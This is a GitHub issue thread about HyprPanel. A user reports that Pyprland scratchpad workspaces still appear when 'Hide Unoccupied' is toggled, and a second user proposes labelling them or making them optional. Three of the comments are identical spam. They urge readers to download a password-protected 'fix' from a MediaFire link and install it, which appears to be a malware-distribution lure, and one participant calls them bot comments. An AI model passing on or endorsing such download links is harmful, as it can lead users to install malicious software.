### ISSUE TITLE
Workspaces show "hidden" Scratchpads when "Hide Occupied" is toggled

### ISSUE THREAD

**Issue by Gajus84** [Jas-SinghFSU/HyprPanel#198]
**Describe the bug**

Using tools  like the Pyprland scratchpads will produce non-empty custom workspaces at -97 for example. There you can hide and toggle applications.

Those should be ignored in the workspace overview as this is kind of the purpose. Hide Unoccupied however is listing them. 

https://hyprland-community.github.io/pyprland/scratchpads.html

**To Reproduce**

1.) Have a Pyprland scratchpad activated.
2.) Toggle "Hide Unoccupied"
3.) Workspaces with a high negative number will be listed.

**Expected behavior**

Don't show those workspaces in the overview, as they are designed to not be toggled like this. And you can't as a matter of fact, as nothing will happen on click.

**Screenshots**

![image](https://github.com/user-attachments/assets/48fe68c2-68dd-4d39-806f-885016f04f3f)

**Desktop (please complete the following information):**
 - Distribution: Arch Linux
 - Window Manager/Desktop Environment: Hyprland

**Additional context**

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mbollemeijer** [comment]
Seeing the same thing. @Jas-SinghFSU very happy with the hide feature :+1: 

Maybe format the "-<inset number here" to something like S1, S2 ? 
Because they are "Scratchpads or Special" in terms of Hyprland

Btw, what are these bot comments?

**Comment by mbollemeijer** [comment]
Optionally hiding them would be a good fit.
I mainly use one "special" workspace for quick access to mail, chat etc. So I don`t need a visual reference to it in the bar.

But I can also imagine if someone uses scratchpads a lot they want to see which ones there are.
Even more ideally imo would be a keybinding and or a bar button triggering some kind of dialog showing the scratchpads and then from there able to switch to them.

Would probably be doable with something like wofi.

But that`s a bit out of scope of this issue I think.
